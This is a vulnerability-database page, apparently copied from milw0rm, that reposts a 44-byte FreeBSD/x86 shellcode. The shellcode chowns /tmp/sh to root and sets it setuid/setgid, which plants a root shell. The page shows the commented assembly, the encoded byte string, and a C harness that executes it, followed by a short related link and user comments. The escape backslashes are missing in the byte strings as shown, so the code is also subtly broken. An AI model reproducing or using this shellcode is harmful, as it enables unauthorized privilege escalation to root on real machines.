FreeBSD/x86 – chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes)
漏洞ID | 1054673 | 漏洞类型 | |
发布时间 | 2004-09-26 | 更新时间 | 2004-09-26 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | FreeBSD_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* FreeBSD shellcode
* chown("/tmp/sh", 0, 0); chmod("/tmp/sh", 06755);
* 44 bytes
*
* Claes M. Nyberg 20020209
*
* <[email protected]>, <[email protected]>
*/
/*************************************************************
void
main(void)
{
__asm__("
xor %eax, %eax # eax = 0
pushl %eax # string ends with NULL
pushl $0x68732f2f # push 'hs//' (//sh)
pushl $0x706d742f # push 'pmt/' (/tmp)
movl %esp, %ebx # ebx = &string[0]
push %eax # 0
push %eax # 0
push %ebx # /tmp/sh
push %eax # Dummy
mov $0x10, %al # eax = 16 = chown
int $0x80 # chown(/tmp/sh, 0, 0);
xor %eax, %eax # eax = 0
or $0xded, %ax # eax = 06755
pushl %eax # 06755
push %ebx # /tmp/sh
pushl %eax # dummy
xor %eax, %eax # eax = 0
mov $0xf, %al # eax = 15 = chmod
int $0x80 # chmod(/tmp/sh, 06755);
mov $0x1, %al # eax = 1 = exit
push %eax # exit value = 1
push %eax # Dummy
int $0x80 # exit(1);
");
}
*************************************************************/
#include <stdio.h>
#include <string.h>
static char freebsd_code[] =
"x31xc0" /* xor %eax, %eax */
"x50" /* pushl %eax */
"x68x2fx2fx73x68" /* pushl $0x68732f2f */
"x68x2fx74x6dx70" /* pushl $0x706d742f */
"x89xe3" /* movl %esp, %ebx */
"x50" /* pushl %eax */
"x50" /* pushl %eax */
"x53" /* pushl %ebx */
"x50" /* pushl %eax */
"xb0x10" /* mov $0x10, %al */
"xcdx80" /* int $0x80 */
"x31xc0" /* xor %eax, %eax */
"x66x0dxedx0d" /* or $0xded, %ax */
"x50" /* pushl %eax */
"x53" /* push %ebx */
"x50" /* pushl %eax */
"x31xc0" /* xor %eax, %eax */
"xb0x0f" /* mov $0xf, %al */
"xcdx80" /* int $0x80 */
"xb0x01" /* mov $0x1, %al */
"x50" /* push %eax */
"x50" /* push %eax */
"xcdx80"; /* int $0x80 */
static char _freebsd_code[] =
"x31xc0x50x68x2fx2fx73x68"
"x68x2fx74x6dx70x89xe3x50"
"x50x53x50xb0x10xcdx80x31"
"xc0x66x0dxedx0dx50x53x50"
"x31xc0xb0x0fxcdx80xb0x01"
"x50x50xcdx80";
void
main(void)
{
void (*code)() = (void *)_freebsd_code;
printf("strlen code: %dn", strlen(freebsd_code));
code();
}
// milw0rm.com [2004-09-26]
相关推荐: BSD Nvi Format String Vulnerability
BSD Nvi Format String Vulnerability 漏洞ID 1102803 漏洞类型 Input Validation Error 发布时间 2001-10-20 更新时间 2001-10-20 CVE编号 N/A CNNVD-ID N/…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666